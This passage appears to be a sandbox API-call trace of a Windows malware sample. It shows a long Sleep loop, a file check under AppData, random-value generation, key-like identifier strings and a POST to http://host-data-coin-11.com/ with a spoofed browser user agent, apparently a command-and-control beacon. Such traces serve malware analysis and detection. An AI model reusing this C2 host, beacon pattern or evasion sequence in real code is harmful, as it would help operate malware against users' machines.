(dwMilliseconds=0x258) [0226.835] Sleep (dwMilliseconds=0x258) [0226.848] Sleep (dwMilliseconds=0x258) [0226.864] Sleep (dwMilliseconds=0x258) [0226.898] Sleep (dwMilliseconds=0x258) [0226.912] Sleep (dwMilliseconds=0x258) [0226.973] Sleep (dwMilliseconds=0x258) [0227.023] Sleep (dwMilliseconds=0x258) [0227.043] Sleep (dwMilliseconds=0x258) [0227.051] Sleep (dwMilliseconds=0x258) [0227.075] Sleep (dwMilliseconds=0x258) [0227.082] Sleep (dwMilliseconds=0x258) [0227.098] Sleep (dwMilliseconds=0x258) [0227.135] Sleep (dwMilliseconds=0x258) [0227.202] Sleep (dwMilliseconds=0x258) [0227.554] Sleep (dwMilliseconds=0x258) [0227.747] Sleep (dwMilliseconds=0x258) [0227.922] Sleep (dwMilliseconds=0x258) [0228.009] Sleep (dwMilliseconds=0x258) [0228.065] Sleep (dwMilliseconds=0x258) [0228.145] Sleep (dwMilliseconds=0x258) [0228.487] Sleep (dwMilliseconds=0x258) [0228.714] Sleep (dwMilliseconds=0x258) [0228.820] Sleep (dwMilliseconds=0x258) [0228.949] Sleep (dwMilliseconds=0x258) [0228.988] Sleep (dwMilliseconds=0x258) [0229.235] Sleep (dwMilliseconds=0x258) [0229.288] Sleep (dwMilliseconds=0x258) [0229.325] Sleep (dwMilliseconds=0x258) [0229.332] Sleep (dwMilliseconds=0x258) [0229.373] Sleep (dwMilliseconds=0x258) [0229.454] Sleep (dwMilliseconds=0x258) [0229.502] Sleep (dwMilliseconds=0x258) [0229.562] Sleep (dwMilliseconds=0x258) [0229.563] Sleep (dwMilliseconds=0x258) [0229.578] Sleep (dwMilliseconds=0x258) [0229.596] Sleep (dwMilliseconds=0x258) [0229.647] Sleep (dwMilliseconds=0x258) [0229.689] Sleep (dwMilliseconds=0x258) [0229.734] Sleep (dwMilliseconds=0x258) [0229.838] Sleep (dwMilliseconds=0x258) [0229.843] Sleep (dwMilliseconds=0x258) [0229.859] Sleep (dwMilliseconds=0x258) [0229.875] Sleep (dwMilliseconds=0x258) [0229.937] Sleep (dwMilliseconds=0x258) [0229.984] Sleep (dwMilliseconds=0x258) [0230.033] Sleep (dwMilliseconds=0x258) [0230.046] Sleep (dwMilliseconds=0x258) [0230.062] Sleep (dwMilliseconds=0x258) [0230.078] Sleep (dwMilliseconds=0x258) [0230.096] Sleep (dwMilliseconds=0x258) [0230.156] Sleep (dwMilliseconds=0x258) [0230.203] Sleep (dwMilliseconds=0x258) [0230.384] Sleep (dwMilliseconds=0x258) [0230.428] Sleep (dwMilliseconds=0x258) [0230.463] Sleep (dwMilliseconds=0x258) [0230.902] Sleep (dwMilliseconds=0x258) [0231.881] Sleep (dwMilliseconds=0x258) [0232.028] Sleep (dwMilliseconds=0x258) [0232.371] Sleep (dwMilliseconds=0x258) [0232.549] Sleep (dwMilliseconds=0x258) [0232.590] Sleep (dwMilliseconds=0x258) [0232.626] Sleep (dwMilliseconds=0x258) [0233.545] Sleep (dwMilliseconds=0x258) [0234.215] Sleep (dwMilliseconds=0x258) [0234.571] Sleep (dwMilliseconds=0x258) [0235.078] Sleep (dwMilliseconds=0x258) [0235.151] Sleep (dwMilliseconds=0x258) [0235.226] Sleep (dwMilliseconds=0x258) [0235.290] Sleep (dwMilliseconds=0x258) [0236.000] Sleep (dwMilliseconds=0x258) [0236.216] Sleep (dwMilliseconds=0x258) [0236.406] Sleep (dwMilliseconds=0x258) [0236.464] Sleep (dwMilliseconds=0x258) [0236.538] Sleep (dwMilliseconds=0x258) [0236.767] Sleep (dwMilliseconds=0x258) [0236.824] Sleep (dwMilliseconds=0x258) [0236.847] Sleep (dwMilliseconds=0x258) [0237.144] Sleep (dwMilliseconds=0x258) [0237.174] Sleep (dwMilliseconds=0x258) [0237.304] Sleep (dwMilliseconds=0x258) [0237.509] Sleep (dwMilliseconds=0x258) [0237.929] Sleep (dwMilliseconds=0x258) [0238.016] Sleep (dwMilliseconds=0x258) [0238.071] Sleep (dwMilliseconds=0x258) [0238.167] Sleep (dwMilliseconds=0x258) [0238.266] Sleep (dwMilliseconds=0x258) [0238.330] Sleep (dwMilliseconds=0x258) [0238.417] Sleep (dwMilliseconds=0x258) [0238.593] Sleep (dwMilliseconds=0x258) [0238.695] Sleep (dwMilliseconds=0x258) [0238.720] Sleep (dwMilliseconds=0x258) [0238.799] Sleep (dwMilliseconds=0x258) [0238.876] Sleep (dwMilliseconds=0x258) [0238.965] Sleep (dwMilliseconds=0x258) [0239.004] Sleep (dwMilliseconds=0x258) [0239.020] Sleep (dwMilliseconds=0x258) [0239.032] Sleep (dwMilliseconds=0x258) [0239.094] Sleep (dwMilliseconds=0x258) [0239.143] Sleep (dwMilliseconds=0x258) [0239.186] Sleep (dwMilliseconds=0x258) [0239.190] Sleep (dwMilliseconds=0x258) [0239.205] Sleep (dwMilliseconds=0x258) [0239.245] Sleep (dwMilliseconds=0x258) [0239.361] Sleep (dwMilliseconds=0x258) [0239.438] Sleep (dwMilliseconds=0x258) [0239.511] Sleep (dwMilliseconds=0x258) [0239.516] Sleep (dwMilliseconds=0x258) [0239.534] Sleep (dwMilliseconds=0x258) [0239.547] Sleep (dwMilliseconds=0x258) [0239.562] Sleep (dwMilliseconds=0x258) [0239.578] Sleep (dwMilliseconds=0x258) [0239.641] Sleep (dwMilliseconds=0x258) [0239.700] Sleep (dwMilliseconds=0x258) [0239.759] Sleep (dwMilliseconds=0x258) [0239.765] Sleep (dwMilliseconds=0x258) [0239.782] Sleep (dwMilliseconds=0x258) [0239.796] Sleep (dwMilliseconds=0x258) [0239.812] Sleep (dwMilliseconds=0x258) [0239.831] Sleep (dwMilliseconds=0x258) [0239.896] Sleep (dwMilliseconds=0x258) [0239.939] Sleep (dwMilliseconds=0x258) [0239.997] Sleep (dwMilliseconds=0x258) [0239.999] Sleep (dwMilliseconds=0x258) [0240.015] Sleep (dwMilliseconds=0x258) [0240.030] Sleep (dwMilliseconds=0x258) [0240.046] Sleep (dwMilliseconds=0x258) [0240.061] Sleep (dwMilliseconds=0x258) [0240.125] Sleep (dwMilliseconds=0x258) [0240.171] Sleep (dwMilliseconds=0x258) [0240.240] Sleep (dwMilliseconds=0x258) [0240.249] Sleep (dwMilliseconds=0x258) [0240.264] Sleep (dwMilliseconds=0x258) [0240.286] Sleep (dwMilliseconds=0x258) [0240.296] Sleep (dwMilliseconds=0x258) [0240.344] Sleep (dwMilliseconds=0x258) [0240.407] Sleep (dwMilliseconds=0x258) [0240.484] Sleep (dwMilliseconds=0x258) [0240.533] Sleep (dwMilliseconds=0x258) [0240.593] Sleep (dwMilliseconds=0x258) [0240.622] Sleep (dwMilliseconds=0x258) [0240.624] Sleep (dwMilliseconds=0x258) [0240.707] Sleep (dwMilliseconds=0x258) [0240.781] Sleep (dwMilliseconds=0x258) [0240.814] Sleep (dwMilliseconds=0x258) [0240.827] Sleep (dwMilliseconds=0x258) [0240.905] Sleep (dwMilliseconds=0x258) [0240.968] Sleep (dwMilliseconds=0x258) [0241.008] Sleep (dwMilliseconds=0x258) [0241.014] Sleep (dwMilliseconds=0x258) [0241.077] Sleep (dwMilliseconds=0x258) [0241.101] Sleep (dwMilliseconds=0x258) [0241.154] Sleep (dwMilliseconds=0x258) [0241.174] Sleep (dwMilliseconds=0x258) [0241.187] Sleep (dwMilliseconds=0x258) [0241.250] Sleep (dwMilliseconds=0x258) [0241.275] Sleep (dwMilliseconds=0x258) [0241.342] Sleep (dwMilliseconds=0x258) [0241.363] Sleep (dwMilliseconds=0x258) [0241.442] Sleep (dwMilliseconds=0x258) [0241.493] Sleep (dwMilliseconds=0x258) [0241.552] Sleep (dwMilliseconds=0x258) [0241.593] Sleep (dwMilliseconds=0x258) [0241.639] Sleep (dwMilliseconds=0x258) [0241.674] Sleep (dwMilliseconds=0x258) [0241.703] Sleep (dwMilliseconds=0x258) [0241.716] Sleep (dwMilliseconds=0x258) [0241.732] Sleep (dwMilliseconds=0x258) [0241.794] Sleep (dwMilliseconds=0x258) [0241.858] Sleep (dwMilliseconds=0x258) [0241.933] Sleep (dwMilliseconds=0x258) [0241.935] Sleep (dwMilliseconds=0x258) [0241.950] Sleep (dwMilliseconds=0x258) [0241.967] Sleep (dwMilliseconds=0x258) [0241.982] Sleep (dwMilliseconds=0x258) [0242.046] Sleep (dwMilliseconds=0x258) [0242.092] Sleep (dwMilliseconds=0x258) [0242.159] Sleep (dwMilliseconds=0x258) [0242.182] Sleep (dwMilliseconds=0x258) [0242.184] Sleep (dwMilliseconds=0x258) [0242.201] Sleep (dwMilliseconds=0x258) [0242.216] Sleep (dwMilliseconds=0x258) [0242.295] Sleep (dwMilliseconds=0x258) [0242.341] Sleep (dwMilliseconds=0x258) [0242.380] Sleep (dwMilliseconds=0x258) [0242.387] Sleep (dwMilliseconds=0x258) [0242.431] Sleep (dwMilliseconds=0x258) [0242.441] Sleep (dwMilliseconds=0x258) [0242.451] Sleep (dwMilliseconds=0x258) [0242.512] Sleep (dwMilliseconds=0x258) [0242.559] Sleep (dwMilliseconds=0x258) [0242.584] Sleep (dwMilliseconds=0x258) [0242.590] Sleep (dwMilliseconds=0x258) [0242.613] Sleep (dwMilliseconds=0x258) [0242.621] Sleep (dwMilliseconds=0x258) [0242.637] Sleep (dwMilliseconds=0x258) [0242.652] Sleep (dwMilliseconds=0x258) [0242.746] Sleep (dwMilliseconds=0x258) [0242.793] Sleep (dwMilliseconds=0x258) [0242.833] Sleep (dwMilliseconds=0x258) [0242.839] Sleep (dwMilliseconds=0x258) [0242.855] Sleep (dwMilliseconds=0x258) [0242.871] Sleep (dwMilliseconds=0x258) [0242.898] Sleep (dwMilliseconds=0x258) [0242.902] Sleep (dwMilliseconds=0x258) [0242.965] Sleep (dwMilliseconds=0x258) [0243.014] Sleep (dwMilliseconds=0x258) [0243.044] Sleep (dwMilliseconds=0x258) [0243.058] Sleep (dwMilliseconds=0x258) [0243.074] Sleep (dwMilliseconds=0x258) [0243.089] Sleep (dwMilliseconds=0x258) [0243.105] Sleep (dwMilliseconds=0x258) [0243.123] Sleep (dwMilliseconds=0x258) [0243.183] Sleep (dwMilliseconds=0x258) [0243.231] Sleep (dwMilliseconds=0x258) [0243.277] Sleep (dwMilliseconds=0x258) [0243.302] Sleep (dwMilliseconds=0x258) [0243.307] Sleep (dwMilliseconds=0x258) [0243.323] Sleep (dwMilliseconds=0x258) [0243.339] Sleep (dwMilliseconds=0x258) [0243.401] Sleep (dwMilliseconds=0x258) [0243.448] Sleep (dwMilliseconds=0x258) [0243.515] Sleep (dwMilliseconds=0x258) [0243.526] Sleep (dwMilliseconds=0x258) [0243.548] Sleep (dwMilliseconds=0x258) [0243.558] Sleep (dwMilliseconds=0x258) [0243.572] Sleep (dwMilliseconds=0x258) [0243.634] Sleep (dwMilliseconds=0x258) [0243.703] Sleep (dwMilliseconds=0x258) [0243.730] Sleep (dwMilliseconds=0x258) [0243.744] Sleep (dwMilliseconds=0x258) [0243.759] Sleep (dwMilliseconds=0x258) [0243.775] Sleep (dwMilliseconds=0x258) [0243.790] Sleep (dwMilliseconds=0x258) [0243.807] Sleep (dwMilliseconds=0x258) [0243.884] Sleep (dwMilliseconds=0x258) [0243.932] Sleep (dwMilliseconds=0x258) [0243.964] Sleep (dwMilliseconds=0x258) [0243.978] Sleep (dwMilliseconds=0x258) [0243.994] Sleep (dwMilliseconds=0x258) [0244.009] Sleep (dwMilliseconds=0x258) [0244.026] Sleep (dwMilliseconds=0x258) [0244.041] Sleep (dwMilliseconds=0x258) [0244.103] Sleep (dwMilliseconds=0x258) [0244.152] Sleep (dwMilliseconds=0x258) [0244.204] Sleep (dwMilliseconds=0x258) [0244.213] Sleep (dwMilliseconds=0x258) [0244.232] Sleep (dwMilliseconds=0x258) [0244.244] Sleep (dwMilliseconds=0x258) [0244.262] Sleep (dwMilliseconds=0x258) [0244.338] Sleep (dwMilliseconds=0x258) [0244.405] Sleep (dwMilliseconds=0x258) [0244.438] Sleep (dwMilliseconds=0x258) [0244.451] Sleep (dwMilliseconds=0x258) [0244.462] Sleep (dwMilliseconds=0x258) [0244.478] Sleep (dwMilliseconds=0x258) [0244.495] Sleep (dwMilliseconds=0x258) [0244.512] Sleep (dwMilliseconds=0x258) [0244.571] Sleep (dwMilliseconds=0x258) [0244.647] Sleep (dwMilliseconds=0x258) [0244.672] Sleep (dwMilliseconds=0x258) [0244.705] Sleep (dwMilliseconds=0x258) [0244.712] Sleep (dwMilliseconds=0x258) [0244.727] Sleep (dwMilliseconds=0x258) [0244.790] Sleep (dwMilliseconds=0x258) [0244.839] Sleep (dwMilliseconds=0x258) [0244.940] Sleep (dwMilliseconds=0x258) [0244.949] Sleep (dwMilliseconds=0x258) [0244.961] Sleep (dwMilliseconds=0x258) [0245.025] Sleep (dwMilliseconds=0x258) [0245.087] Sleep (dwMilliseconds=0x258) [0245.111] Sleep (dwMilliseconds=0x258) [0245.117] Sleep (dwMilliseconds=0x258) [0245.180] Sleep (dwMilliseconds=0x258) [0245.208] Sleep (dwMilliseconds=0x258) [0245.258] Sleep (dwMilliseconds=0x258) [0245.311] Sleep (dwMilliseconds=0x258) [0245.352] Sleep (dwMilliseconds=0x258) [0245.377] Sleep (dwMilliseconds=0x258) [0245.382] Sleep (dwMilliseconds=0x258) [0245.400] Sleep (dwMilliseconds=0x258) [0245.460] Sleep (dwMilliseconds=0x258) [0245.582] Sleep (dwMilliseconds=0x258) [0245.726] Sleep (dwMilliseconds=0x258) [0245.761] Sleep (dwMilliseconds=0x258) [0245.850] Sleep (dwMilliseconds=0x258) [0245.930] Sleep (dwMilliseconds=0x258) [0245.962] Sleep (dwMilliseconds=0x258) [0245.979] Sleep (dwMilliseconds=0x258) [0246.038] Sleep (dwMilliseconds=0x258) [0246.087] Sleep (dwMilliseconds=0x258) [0246.140] Sleep (dwMilliseconds=0x258) [0246.169] Sleep (dwMilliseconds=0x258) [0246.210] Sleep (dwMilliseconds=0x258) [0246.241] Sleep (dwMilliseconds=0x258) [0246.259] Sleep (dwMilliseconds=0x258) [0246.339] Sleep (dwMilliseconds=0x258) [0246.382] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x26) returned 0x7f12300 [0246.382] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35acf889 [0246.383] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x69) returned 0x83000a0 [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58014cf8 [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4cd86f5d [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x478bceaa [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x668a416a [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d158718 [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5660c49d [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71f161c3 [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e4810c6 [0246.383] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43c7b33b [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d814cdb [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x404ae18e [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x561d41aa [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5bbd51cb [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4bbae75e [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4077c933 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56431c9 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48568d02 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10aed6d7 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ec57c56 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5280f4cd [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf0707ce [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f784ad8 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6598eeb [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x179aa92b [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a7296ee [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5cd5b5a9 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b754ed4 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5fbe1ea3 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x715b48cf [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x13ecb086 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b8fefe4 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35e7fff3 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22096bfd [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ff6b507 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf104f20 [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7515b45d [0246.384] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x495067f5 [0246.385] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf3eff1f [0246.385] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74b23b3e [0246.385] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77882b16 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c9ecb3a [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c6398c8 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3033cdd6 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5186f320 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e0426c1 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x53b4e4a3 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e79eeca [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x438a0fe6 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11c074cf [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x60e0ad70 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d32213d [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x715ca81 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26ea1b8c [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1210a6dc [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e0c4886 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17926c01 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1e06c2 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a50c352 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18b82f6c [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70d3e6b3 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x30d9d79b [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4aab2ed1 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x430f26be [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x316ccd61 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d322cad [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5278db8a [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57201aba [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12523ce4 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c5b86b1 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x143ebdd4 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x556e320b [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f2d0d1d [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ecbb94a [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x465243f5 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf10ac0f [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f63cb90 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x390709f0 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x668a8ac8 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35aee623 [0246.386] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x780d4bc2 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x147c8009 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64c09219 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x13d38c31 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4757aa1f [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b6d357e [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d718c0e [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc65cee0 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43c0a9 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1119c71e [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe373880 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c693584 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26009184 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63d67c47 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbc48b80 [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x464f2a7a [0246.387] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1e848aa9 [0246.387] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0xb8) returned 0x8300120 [0246.387] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0246.387] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0246.388] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0246.388] lstrcatA (in: lpString1="", lpString2=")\"mcA:^#HHIqfO0v14cz+7F>EXQL$gu2.nUT6BIS[M)gjf-!(5X>C][tSYoxDD+H^a1yX3@n[\\t![GZ-Jjz\\?KQtO[)?.9[4" | out: lpString1=")\"mcA:^#HHIqfO0v14cz+7F>EXQL$gu2.nUT6BIS[M)gjf-!(5X>C][tSYoxDD+H^a1yX3@n[\\t![GZ-Jjz\\?KQtO[)?.9[4") returned=")\"mcA:^#HHIqfO0v14cz+7F>EXQL$gu2.nUT6BIS[M)gjf-!(5X>C][tSYoxDD+H^a1yX3@n[\\t![GZ-Jjz\\?KQtO[)?.9[4" [0246.388] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10c) returned 0x83001e0 [0246.388] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0246.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f12300, cbMultiByte=30, lpWideCharStr=0x83001e0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0246.388] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x7d6f7b8 | out: pProxyConfig=0x7d6f7b8) returned 1 [0246.488] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb03a0 [0246.490] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x7d6f870 | out: lpUrlComponents=0x7d6f870) returned 1 [0246.490] WinHttpConnect (hSession=0x3fb03a0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83fd0 [0246.491] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x8300300 [0246.491] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x68) returned 0x8300320 [0246.491] WinHttpOpenRequest (hConnect=0x3f83fd0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x71c9ba0 [0246.491] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x4e) returned 0x8300390 [0246.491] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10d) returned 0x83003f0 [0246.491] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4420d8a7 [0246.491] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x8300510 [0246.491] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x17) returned 0x8300530 [0246.491] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4af353ec [0246.491] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e60c540 [0246.491] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1508bde2 [0246.491] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20d77402 [0246.491] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3437a7c8 [0246.492] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x787eca11 [0246.492] 